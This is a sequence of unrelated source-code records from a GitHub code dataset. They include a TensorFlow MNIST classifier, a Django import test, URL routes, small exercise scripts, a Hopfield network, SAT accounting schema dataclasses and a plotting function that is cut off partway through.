plt.imshow(tmp)\r\n plt.show()\r\n\r\n# images:训练集的feature部分\r\n# labels:训练集的label部分\r\n# batch_size: 每次训练的batch大小\r\n# epoch_num: 训练的epochs数\r\n# shuffle: 是否打乱数据\r\n# 使用示例:\r\n# for (batchImages, batchLabels) in batch_iter(images_train, labels_train, batch_size, epoch_num, shuffle=True):\r\n# sess.run(feed_dict={inputLayer: batchImages, outputLabel: batchLabels})\r\ndef batch_iter(images,labels, batch_size, epoch_num, shuffle=True):\r\n \r\n data_size = len(images)\r\n \r\n num_batches_per_epoch = int(data_size / batch_size) # 样本数/batch块大小,多出来的“尾数”,不要了\r\n \r\n for epoch in range(epoch_num):\r\n # Shuffle the data at each epoch\r\n if shuffle:\r\n shuffle_indices = np.random.permutation(np.arange(data_size))\r\n \r\n shuffled_data_feature = images[shuffle_indices]\r\n shuffled_data_label = labels[shuffle_indices]\r\n else:\r\n shuffled_data_feature = images\r\n shuffled_data_label = labels\r\n\r\n for batch_num in range(num_batches_per_epoch): # batch_num取值0到num_batches_per_epoch-1\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, data_size)\r\n\r\n yield (shuffled_data_feature[start_index:end_index] , shuffled_data_label[start_index:end_index])\r\n\r\n#FCN全卷积神经网络\r\ndef fcn_layer(inputs, # input data\r\n input_dim, # Input numbers of Neurons\r\n output_dim, # Output numbers of Neurons\r\n activation=None): # activation function\r\n # Random numbers that generate data that is more than twice the standard deviation will be replaced here\r\n W = tf.Variable(tf.truncated_normal([input_dim, output_dim], stddev=0.1))\r\n b = tf.Variable(tf.zeros([output_dim])) # init as 0\r\n\r\n XWb = tf.matmul(inputs, W) + b\r\n\r\n if activation is None:\r\n outputs = XWb\r\n else:\r\n outputs = activation(XWb)\r\n\r\n return outputs\r\n\r\n# 构建和训练模型\r\ndef train_and_test(images_train, labels_train, images_test, labels_test,\r\n images_validation, labels_validation):\r\n # Input layers (28*28*1)\r\n x = tf.placeholder(tf.float32, [None, 784], name=\"X\")\r\n # 0-9 => 10 numbers\r\n y = tf.placeholder(tf.float32, [None, 10], name=\"Y\")\r\n # 2 Hidden layers\r\n h1 = fcn_layer(inputs=x,\r\n input_dim=784,\r\n output_dim=256,\r\n activation=tf.nn.relu)\r\n h2 = fcn_layer(inputs=h1,\r\n input_dim=256,\r\n output_dim=64,\r\n activation=tf.nn.relu)\r\n # Output layers\r\n forward = fcn_layer(inputs=h2,\r\n input_dim=64,\r\n output_dim=10,\r\n activation=None)\r\n pred = tf.nn.softmax(forward)\r\n\r\n loss_function = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(logits=forward, labels=y))\r\n\r\n train_epochs = 20 # Train times\r\n batch_size = 100 # single batch train size\r\n learning_rate = 0.001 # learning rate\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss_function)\r\n\r\n correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\r\n\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n startTime = time()\r\n\r\n sess = tf.Session()\r\n init = tf.global_variables_initializer()\r\n sess.run(init)\r\n\r\n for epoch in range(train_epochs):\r\n for xs, ys in batch_iter(images_train, labels_train, batch_size, 1, shuffle=True):\r\n sess.run(optimizer, feed_dict={x: xs, y: ys})\r\n\r\n loss, acc = sess.run([loss_function, accuracy],\r\n feed_dict={x: images_test, y: labels_test})\r\n\r\n print(f\"[+] {'%02d' % (epoch + 1)}th train:\\tloss:\", \"{:.9f}\".format(loss), \"\\taccuracy:\", \"{:.4f}\".format(acc))\r\n\r\n duration = time() - startTime\r\n print(\"[+] Train finished successfully. It takes:\", \"{:.2f}s\".format(duration))\r\n\r\n accu_test = sess.run(accuracy, feed_dict={x: images_test, y: labels_test})\r\n accu_validation = sess.run(accuracy, feed_dict={x: images_validation, y: labels_validation})\r\n return accu_test,accu_validation\r\n\r\n# 划分数据集并调用train_and_test测试和验证\r\ndef hold_out(images, labels, train_percentage):\r\n X_train, X_test, Y_train, Y_test = train_test_split(images,\r\n labels,\r\n test_size=1 - train_percentage,\r\n random_state=1,\r\n stratify=labels)\r\n return X_train, Y_train, X_test, Y_test\r\n\r\ndef cross_validation(images, labels, k, vali_images, vali_labels):\r\n total_images = [[] for _ in range(10)]\r\n total_labels = [[] for _ in range(10)]\r\n\r\n for i in range(len(images)):\r\n index = get_label(labels[i])\r\n total_images[index].append(images[i])\r\n total_labels[index].append(labels[i])\r\n\r\n k_total_images = []\r\n k_total_labels = [] # 大小为k\r\n for i in range(10):\r\n for j in range(k):\r\n k_total_images.append(total_images[i][int(j * len(total_images[i]) / k):int((j + 1) * len(total_images[i]) / k)]) # 长度为k*10,里面的列表长度为len(total_images[i])/k\r\n k_total_labels.append(total_labels[i][int(j * len(total_images[i]) / k):int((j + 1) * len(total_images[i]) / k)])\r\n\r\n tmp_accu_test = 0\r\n tmp_accu_vali = 0\r\n for idex in range(k):\r\n X_test_images = k_total_images[idex] # 大小为1\r\n Y_test_labels = k_total_labels[idex]\r\n X_train_images = k_total_images # 大小为k-1\r\n Y_train_labels = k_total_labels\r\n del X_train_images[idex] # 大小为k-1 del删除变量\r\n del Y_train_labels[idex]\r\n\r\n f_X_train_images = []\r\n f_Y_train_labels = []\r\n\r\n for i in range(len(X_train_images)):\r\n for j in range(len(X_train_images[i])):\r\n f_X_train_images.append(X_train_images[i][j])\r\n f_Y_train_labels.append(Y_train_labels[i][j])\r\n\r\n f_X_train_images, f_Y_train_labels = np.array(f_X_train_images), np.array(f_Y_train_labels)\r\n X_test_images, Y_test_labels = np.array(X_test_images), np.array(Y_test_labels)\r\n\r\n print(\"[-] k = {},当前第{}组为测试集\".format(k, idex+1))\r\n accu_test,accu_validation = train_and_test(f_X_train_images, f_Y_train_labels, X_test_images, Y_test_labels,\r\n vali_images, vali_labels)\r\n print(\"[*] Temp accuracy of test :\", accu_test)\r\n print(\"[*] Temp accuracy of validation :\", accu_validation)\r\n tmp_accu_test += accu_test\r\n tmp_accu_vali += accu_validation\r\n\r\n print(\"[*] Average accuracy of test :\", tmp_accu_test / k)\r\n print(\"[*] Average accuracy of validation :\", tmp_accu_vali / k)\r\n \r\ndef main():\r\n # 读取数据集\r\n mnist = input_data.read_data_sets('./mnist_dataset', one_hot=True)\r\n # 训练集\r\n total_images = mnist.train.images\r\n total_labels = mnist.train.labels\r\n total_images, total_labels = shuffer_images_and_labels(total_images, total_labels)\r\n # 验证集\r\n validation_images = mnist.validation.images\r\n validation_labels = mnist.validation.labels\r\n validation_images, validation_labels = shuffer_images_and_labels(validation_images, validation_labels)\r\n\r\n # print(total_images.shape, total_labels.shape)\r\n # print(validation_images.shape, validation_labels.shape)\r\n # print(get_label(total_labels[0]))\r\n # show_image(total_images[0])\r\n\r\n # 简单划分前50000个为训练集,后5000个为测试集,对其进行训练,并使用验证集评估模型\r\n print(\"简单划分前50000个为训练集,后5000个为测试集,对其进行训练,并使用验证集评估模型\")\r\n origin_images_train = total_images[:50000]\r\n origin_labels_train = total_labels[:50000]\r\n origin_images_test = total_images[50000:]\r\n origin_labels_test = total_labels[50000:]\r\n accu_test,accu_validation = train_and_test(origin_images_train, origin_labels_train, origin_images_test, origin_labels_test,\r\n validation_images, validation_labels)\r\n print(\"[*] Accuracy of test :\", accu_test)\r\n print(\"[*] Accuracy of validation :\", accu_validation)\r\n\r\n\r\n # 使用分层采样的留出法训练、测试模型,并使用验证集评估模型\r\n # h = 0.8\r\n # print(\"使用分层采样的留出法训练、测试模型,并使用验证集评估模型\")\r\n # print(\"划分比例为 {}%\".format(h * 100))\r\n # origin_images_train, origin_labels_train, origin_images_test, origin_labels_test = hold_out(total_images, total_labels, h)\r\n # accu_test,accu_validation = train_and_test(origin_images_train, origin_labels_train, origin_images_test, origin_labels_test,\r\n # validation_images, validation_labels)\r\n # print(\"[*] Accuracy of test :\", accu_test)\r\n # print(\"[*] Accuracy of validation :\", accu_validation)\r\n\r\n # 使用分层采样的k折交叉验证法训练、测试模型,并使用验证集评估模型\r\n # k = 20\r\n # print(\"使用分层采样的k折交叉验证法训练、测试模型,并使用验证集评估模型\")\r\n # print(\"k =\", k)\r\n # cross_validation(total_images, total_labels, k, validation_images, validation_labels)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"lucifer9735/tensorflow_mnist","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":10631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"461342199","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nimport pytest\nfrom django.core.files.base import ContentFile\n\nfrom common.models.schedule import Supplier, RThread\nfrom common.models.tariffs import ThreadTariff\nfrom travel.rasp.admin.importinfo.models.two_stage_import import TwoStageImportPackage, TSISetting\nfrom travel.rasp.admin.lib.logs import get_collector_context\nfrom tester.factories import create_currency\n\n\n@pytest.mark.dbuser\n@pytest.mark.usefixtures('setup_cysix_test_case')\nclass TestMaskEveryNDay(object):\n def setup(self):\n create_currency(code='USD')\n self.supplier = Supplier.objects.get(code='supplier_1')\n self.package = TwoStageImportPackage.objects.get(supplier=self.supplier)\n TSISetting.objects.get_or_create(package=self.package)\n\n def reimport(self):\n factory = self.package.get_two_stage_factory()\n\n self.package.package_file = ContentFile(CYSIX_XML)\n\n importer = factory.get_two_stage_importer()\n importer.reimport_package()\n\n def test_import_thread_when_fares_are_invalid(self):\n with get_collector_context() as log_cpllector:\n self.reimport()\n log_messages = log_cpllector.get_collected(clean=False).strip().splitlines(False)\n\n thread = RThread.objects.get()\n assert not ThreadTariff.objects.filter(thread_uid=thread.uid).exists()\n\n expected_log_message = (\n 'ERROR: '\n 'Пропускаем тарифы для '\n '> '\n 'Станции '\n 'нет в блоке stations'\n )\n assert expected_log_message in log_messages\n\n\nCYSIX_XML = \"\"\"\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\".strip()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/fares/test_import_thread_when_fares_are_invalid.py","file_name":"test_import_thread_when_fares_are_invalid.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38122657610","text":"\"\"\"\nURL mapping for user API\n\"\"\"\nfrom django.urls import path\nfrom knox import views as knox_views\nfrom user import views\n\napp_name = 'user'\nurlpatterns = [\n path(\n 'register-by-access-token/social/google-oauth2/',\n views.LoginWithGoogle.as_view(),\n name='login_with_google'\n ),\n path('logout/', knox_views.LogoutView.as_view(), name='knox_logout'),\n path(\n 'logout-all-device/',\n knox_views.LogoutAllView.as_view(),\n name='knox_logoutall'\n ),\n]\n","repo_name":"qitpy/django-server","sub_path":"src/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38291030267","text":"import sys\r\n\r\nmovies_count = int(input())\r\n\r\nbest_movie = \"\"\r\nworst_movie = \"\"\r\nbest_move_rating = 0\r\nworst_movie_rating = sys.maxsize\r\nall_rating = 0\r\n\r\nfor i in range(1, movies_count + 1):\r\n movie = input()\r\n rating = float(input())\r\n \r\n all_rating += rating\r\n \r\n if rating > best_move_rating:\r\n best_movie = movie\r\n best_move_rating = rating\r\n \r\n elif rating < worst_movie_rating:\r\n worst_movie = movie\r\n worst_movie_rating = rating\r\n \r\naverage_rating = all_rating / movies_count\r\n\r\nprint(f\"{best_movie} is with highest rating: {best_move_rating:.1f}\")\r\nprint(f\"{worst_movie} is with lowest rating: {worst_movie_rating:.1f}\")\r\nprint(f\"Average rating: {average_rating:.1f}\")\r\n","repo_name":"vkostoff/SoftUni_Python","sub_path":"Programming_Basics/Programming_Basics_Online_Exam_6_and_7_April_2019/movie_ratings.py","file_name":"movie_ratings.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72128935914","text":"from math import comb,gcd,log\nclass Solution:\n def coutPairs(self, nums: list[int], k: int) -> int:\n l={};ans=c=0\n for i in nums:\n g=gcd(k,i)\n l[g]=l.get(g,0)+1\n for i in l:\n if (i*i)%k==0:c+=comb(l[i],2)\n for i in l:\n for j in l:\n if j!=i and (i*j)%k==0:ans+=l[i]*l[j]\n return ans//2 + c","repo_name":"bambamshivam/LeetCode","sub_path":"Weekly_Contest_281/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"31044006089","text":"from dataclasses import dataclass, field\nfrom decimal import Decimal\nfrom typing import List, Optional\nfrom xsdata.models.datatype import XmlDate\n\n__NAMESPACE__ = \"http://www.sat.gob.mx/esquemas/ContabilidadE/1_3/AuxiliarCtas\"\n\n\n@dataclass\nclass AuxiliarCtas:\n \"\"\"\n Estándar de auxiliar de la cuenta o subcuenta del periodo que se entrega\n como parte de la contabilidad electrónica.\n\n :ivar cuenta: Nodo obligatorio para expresar los movimientos del\n periodo de cada uno de los auxiliares de la cuenta y/o\n subcuenta.\n :ivar version: Atributo requerido para expresar la versión del\n formato.\n :ivar rfc: Atributo requerido para expresar el RFC del contribuyente\n que envía los datos.\n :ivar mes: Atributo requerido para expresar el mes en que inicia la\n vigencia del auxiliar de la cuenta o subcuenta.\n :ivar anio: Atributo requerido para expresar el año al que inicia la\n vigencia del auxiliar de la cuenta o subcuenta.\n :ivar tipo_solicitud: Atributo requerido para expresar el tipo de\n envío del auxiliar de la cuenta o subcuenta ( AF - Acto de\n Fiscalización; FC - Fiscalización Compulsa; DE - Devolución; CO\n - Compensación )\n :ivar num_orden: Atributo opcional para expresar el número de orden\n asignado al acto de fiscalización al que hace referencia la\n solicitud del auxiliar de la cuenta o subcuenta. Requerido para\n tipo de solicitud = AF y FC. Se convierte en requerido cuando se\n cuente con la información.\n :ivar num_tramite: Atributo opcional para expresar el número de\n trámite asignado a la solicitud de devolución o compensación al\n que hace referencia el auxiliar de la cuenta o subcuenta.\n Requerido para tipo de solicitud = DE o CO. Se convierte en\n requerido cuando se cuente con la información.\n :ivar sello: Atributo opcional para contener el sello digital del\n archivo de contabilidad electrónica. El sello deberá ser\n expresado cómo una cadena de texto en formato Base 64\n :ivar no_certificado: Atributo opcional para expresar el número de\n serie del certificado de sello digital que ampara el archivo de\n contabilidad electrónica, de acuerdo al acuse correspondiente a\n 20 posiciones otorgado por el sistema del SAT.\n :ivar certificado: Atributo opcional que sirve para expresar el\n certificado de sello digital que ampara al archivo de\n contabilidad electrónica como texto, en formato base 64.\n \"\"\"\n class Meta:\n namespace = \"http://www.sat.gob.mx/esquemas/ContabilidadE/1_3/AuxiliarCtas\"\n namespace_prefix = \"AuxiliarCtas\"\n schema_location = \"http://www.sat.gob.mx/esquemas/ContabilidadE/1_3/AuxiliarCtas/AuxiliarCtas_1_3.xsd\"\n\n cuenta: List[\"AuxiliarCtas.Cuenta\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"Cuenta\",\n \"type\": \"Element\",\n \"min_occurs\": 1,\n }\n )\n version: str = field(\n init=False,\n default=\"1.3\",\n metadata={\n \"name\": \"Version\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n rfc: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"RFC\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 12,\n \"max_length\": 13,\n \"pattern\": r\"[A-ZÑ&]{3,4}[0-9]{2}[0-1][0-9][0-3][0-9][A-Z0-9]?[A-Z0-9]?[0-9A-Z]?\",\n }\n )\n mes: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Mes\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n anio: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"Anio\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": 2015,\n \"max_inclusive\": 2099,\n }\n )\n tipo_solicitud: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"TipoSolicitud\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"pattern\": r\"AF|FC|DE|CO\",\n }\n )\n num_orden: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumOrden\",\n \"type\": \"Attribute\",\n \"length\": 13,\n \"pattern\": r\"[A-Z]{3}[0-9]{7}(/)[0-9]{2}\",\n }\n )\n num_tramite: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumTramite\",\n \"type\": \"Attribute\",\n \"length\": 14,\n \"pattern\": r\"[A-Z]{2}[0-9]{12}\",\n }\n )\n sello: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Sello\",\n \"type\": \"Attribute\",\n \"white_space\": \"collapse\",\n }\n )\n no_certificado: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"noCertificado\",\n \"type\": \"Attribute\",\n \"length\": 20,\n }\n )\n certificado: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Certificado\",\n \"type\": \"Attribute\",\n \"white_space\": \"collapse\",\n }\n )\n\n @dataclass\n class Cuenta:\n \"\"\"\n :ivar detalle_aux: Nodo obligatorio para expresar el detalle de\n los movimientos del periodo de cada uno de los auxiliares\n :ivar num_cta: Atributo requerido para expresar la clave con que\n se distingue la cuenta o subcuenta que se afecta por la\n transacción que integra el auxiliar.\n :ivar des_cta: Atributo requerido para expresar el concepto de\n la cuenta o subcuenta que se afecta por la transacción que\n integra el auxiliar.\n :ivar saldo_ini: Atributo requerido para expresar el monto del\n saldo inicial de la cuenta o subcuenta del periodo del\n auxiliar. En caso de no existir dato, colocar cero (0)\n :ivar saldo_fin: Atributo requerido para expresar el monto del\n saldo final de la cuenta o subcuenta del periodo del\n auxiliar. En caso de no existir dato, colocar cero (0)\n \"\"\"\n detalle_aux: List[\"AuxiliarCtas.Cuenta.DetalleAux\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"DetalleAux\",\n \"type\": \"Element\",\n \"min_occurs\": 1,\n }\n )\n num_cta: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumCta\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 100,\n }\n )\n des_cta: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"DesCta\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 100,\n }\n )\n saldo_ini: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"SaldoIni\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n saldo_fin: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"SaldoFin\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n\n @dataclass\n class DetalleAux:\n \"\"\"\n :ivar fecha: Atributo requerido para expresar la fecha de\n registro de la transacción que afecta la cuenta o\n subcuenta que integra el auxiliar.\n :ivar num_un_iden_pol: Atributo requerido para expresar el\n número único de identificación de la póliza. El campo\n deberá contener la clave o nombre utilizado por el\n contribuyente para diferenciar, el tipo de póliza y el\n número correspondiente. En un mes ordinario no debe\n repetirse un mismo número de póliza con la clave o\n nombre asignado por el contribuyente.\n :ivar concepto: Atributo requerido para expresar el concepto\n de la transacción que integra el auxiliar.\n :ivar debe: Atributo requerido para expresar el monto del\n cargo de la cuenta o subcuenta de la transacción que\n integra el auxiliar. En caso de no existir dato, colocar\n cero (0)\n :ivar haber: Atributo requerido para expresar el monto del\n abono de la cuenta o subcuenta de la transacción que\n integra el auxiliar. En caso de no existir dato, colocar\n cero (0)\n \"\"\"\n fecha: Optional[XmlDate] = field(\n default=None,\n metadata={\n \"name\": \"Fecha\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n num_un_iden_pol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumUnIdenPol\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 50,\n }\n )\n concepto: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Concepto\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 200,\n }\n )\n debe: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"Debe\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n haber: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"Haber\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n","repo_name":"verumconsilium/pyconte","sub_path":"pyconte/auxiliar_ctas_1_3.py","file_name":"auxiliar_ctas_1_3.py","file_ext":"py","file_size_in_byte":11071,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41772786036","text":"import random\nimport time\n\ndef insertionSort(lista):\n for index in range(1,len(lista)):\n\n atual = lista[index]\n posicao = index\n\n while posicao>0 and lista[posicao-1]>atual:\n lista[posicao]=lista[posicao-1]\n posicao = posicao-1\n\n lista[posicao]=atual\n\n\n\nnum = 1000\n #num = 5000\n#num = 10000\n#num = 15000\n#num = 20000\n#num = 25000\n\n\n#lista de 1 a num\n\n\nlista = []\nfor i in range(num):\n lista.append(i + 1)\n\n\n#lista de num a 1\n\n'''\nlista = []\ni = num\nwhile i <= num and i != 0:\n lista.append(i);\n i -= 1;\n'''\n\n\n#lista aleatória\n#lista = random.sample(range(num), num)\n\ninicio = time.time()\ninsertionSort(lista)\nfim = time.time()\nprint(lista)\nprint(fim - inicio)","repo_name":"HenriqueLeal/AlgoritmosDeOrdenacao","sub_path":"insertsort.py","file_name":"insertsort.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29549092300","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Dict, List, Tuple\n\nimport albumentations as A\nimport cv2\nimport torch\n\nfrom dataset.base_dataset import _BaseSODDataset\nfrom dataset.transforms.resize import ms_resize, ss_resize\nfrom dataset.transforms.rotate import UniRotate\nfrom utils.builder import DATASETS\nfrom utils.io.genaral import get_datasets_info_with_keys\nfrom utils.io.image import read_color_array, read_gray_array\n\n\n@DATASETS.register(name=\"msi_cod_te\")\nclass MSICOD_TestDataset(_BaseSODDataset):\n def __init__(self, root: Tuple[str, dict], shape: Dict[str, int], interp_cfg: Dict = None):\n super().__init__(base_shape=shape, interp_cfg=interp_cfg)\n self.datasets = get_datasets_info_with_keys(dataset_infos=[root], extra_keys=[\"mask\"])\n self.total_image_paths = self.datasets[\"image\"]\n self.total_mask_paths = self.datasets[\"mask\"]\n self.image_norm = A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))\n\n def __getitem__(self, index):\n image_path = self.total_image_paths[index]\n mask_path = self.total_mask_paths[index]\n\n image = read_color_array(image_path)\n\n image = self.image_norm(image=image)[\"image\"]\n\n base_h = self.base_shape[\"h\"]\n base_w = self.base_shape[\"w\"]\n images = ms_resize(image, scales=(0.5, 1.0, 1.5), base_h=base_h, base_w=base_w)\n image_0_5 = torch.from_numpy(images[0]).permute(2, 0, 1)\n image_1_0 = torch.from_numpy(images[1]).permute(2, 0, 1)\n image_1_5 = torch.from_numpy(images[2]).permute(2, 0, 1)\n\n return dict(\n data={\n \"image1.5\": image_1_5,\n \"image1.0\": image_1_0,\n \"image0.5\": image_0_5,\n },\n info=dict(\n mask_path=mask_path,\n ),\n )\n\n def __len__(self):\n return len(self.total_image_paths)\n\n\n@DATASETS.register(name=\"msi_cod_tr\")\nclass MSICOD_TrainDataset(_BaseSODDataset):\n def __init__(\n self, root: List[Tuple[str, dict]], shape: Dict[str, int], extra_scales: List = None, interp_cfg: Dict = None\n ):\n super().__init__(base_shape=shape, extra_scales=extra_scales, interp_cfg=interp_cfg)\n self.datasets = get_datasets_info_with_keys(dataset_infos=root, extra_keys=[\"mask\"])\n self.total_image_paths = self.datasets[\"image\"]\n self.total_mask_paths = self.datasets[\"mask\"]\n self.joint_trans = A.Compose(\n [\n A.HorizontalFlip(p=0.5),\n UniRotate(limit=10, interpolation=cv2.INTER_LINEAR, p=0.5),\n A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n ],\n )\n self.reszie = A.Resize\n\n def __getitem__(self, index):\n image_path = self.total_image_paths[index]\n mask_path = self.total_mask_paths[index]\n\n image = read_color_array(image_path)\n mask = read_gray_array(mask_path, to_normalize=True, thr=0.5)\n\n transformed = self.joint_trans(image=image, mask=mask)\n image = transformed[\"image\"]\n mask = transformed[\"mask\"]\n\n base_h = self.base_shape[\"h\"]\n base_w = self.base_shape[\"w\"]\n images = ms_resize(image, scales=(0.5, 1.0, 1.5), base_h=base_h, base_w=base_w)\n image_0_5 = torch.from_numpy(images[0]).permute(2, 0, 1)\n image_1_0 = torch.from_numpy(images[1]).permute(2, 0, 1)\n image_1_5 = torch.from_numpy(images[2]).permute(2, 0, 1)\n\n mask = ss_resize(mask, scale=1.0, base_h=base_h, base_w=base_w)\n mask_1_0 = torch.from_numpy(mask).unsqueeze(0)\n\n return dict(\n data={\n \"image1.5\": image_1_5,\n \"image1.0\": image_1_0,\n \"image0.5\": image_0_5,\n \"mask\": mask_1_0,\n }\n )\n\n def __len__(self):\n return len(self.total_image_paths)\n","repo_name":"lartpang/ZoomNet","sub_path":"dataset/msi_cod.py","file_name":"msi_cod.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"72"} +{"seq_id":"8522876769","text":"import random\nimport math\nimport numpy as np\n\n\nclass HopfieldNetwork:\n def __init__(self, dimension: int, threshold: int = 1000):\n self._taught_shapes = []\n self._dimension = dimension\n self._adjusted_shape = None\n self._amount_of_neurons = int(math.pow(dimension, 2))\n\n self._W = np.zeros(\n (self._amount_of_neurons, self._amount_of_neurons),\n dtype=float\n )\n\n self._threshold = threshold\n self._useless_iteration_count = 0\n\n def teach(self, shape):\n self._taught_shapes.append(shape)\n for i in range(0, self._amount_of_neurons):\n for j in range(0, self._amount_of_neurons):\n if i == j:\n self._W[i][j] = 0\n else:\n y1 = int(i / self._dimension)\n x1 = i % self._dimension\n\n y2 = int(j / self._dimension)\n x2 = j % self._dimension\n\n self._W[i][j] += (shape[y1][x1] * shape[y2][x2])\n\n def recognize(self, shape: np.ndarray):\n self._useless_iteration_count = 0\n self._adjusted_shape = shape\n iterations_amount = 0\n\n while not self._is_shape_recognized():\n iterations_amount += 1\n\n self._recognition_step()\n\n if self._useless_iteration_count >= self._threshold:\n return False, self._adjusted_shape, iterations_amount\n\n return True, self._adjusted_shape, iterations_amount\n\n def _recognition_step(self):\n index = random.randint(0, self._amount_of_neurons - 1)\n\n temp = 0\n for i in range(0, self._amount_of_neurons):\n y = int(i / self._dimension)\n x = i % self._dimension\n temp += (self._adjusted_shape[y][x] * self._W[i][index])\n\n adjusted_value = 1 if temp > 0 else -1\n\n y = int(index / self._dimension)\n x = index % self._dimension\n\n if adjusted_value != self._adjusted_shape[y][x]:\n self._adjusted_shape[y][x] = adjusted_value\n self._useless_iteration_count = 0\n else:\n self._useless_iteration_count += 1\n\n def _is_shape_recognized(self):\n for shape in self._taught_shapes:\n if np.array_equal(self._adjusted_shape, shape):\n return True\n\n return False\n","repo_name":"NasterVill/BSUIR_Labs","sub_path":"7 term/DSIP-Digital-Signal-and-Image-Processing/Lab 3/HopfieldNetwork.py","file_name":"HopfieldNetwork.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"36780969180","text":"from rec import *\nimport matplotlib.pyplot as plt\nfrom rec_utils import *\nimport math\nfrom matplotlib.lines import Line2D\nfrom itertools import chain\n\ndef selectivity_count_plot(subject_list, version_aov, version_fr, selection_list, area_list):\n\n # subject_list = ['Oscar', 'Gonzo']\n # version_aov = 'PresentedStimulus'\n # version_fr = 'ConcatFactor'\n # selection_list = ['PreDist', 'Gating', 'PostDist', 'Target']\n # area_list = ['PFC']\n # ylim_arg = None\n # title = ''\n\n # version parameters\n v_aov_params = anova_version_aov_params(version_aov, version_fr)\n x_factors = v_aov_params['x_factors']\n x_cluster_label = x_factors[0]\n\n v_fr_params = version_fr_params(version_fr)\n t_start = v_fr_params['t_start']\n t_end = v_fr_params['t_end']\n timebin = v_fr_params['timebin']\n timestep = v_fr_params['timestep']\n\n # init\n md = MetaData()\n db = md.db_base_loader(['sessions', 'units'])\n sessions, units = db['sessions'], db['units']\n\n anova = Anova(DataBase([]), {'aov': version_aov, 'fr': version_fr})\n anova.load_physiology_dict(cropped=True)\n physiology_dict = anova.physiology_dict\n\n if not bool(selection_list):\n selection_list = v_aov_params['selection_dict']['list']\n\n # plotting parameters\n if selection_list == ['All']:\n color_list = ['#d817a5', '#48b213', '#727272']\n shade_color_list = ['#f230be', '#5fce27', 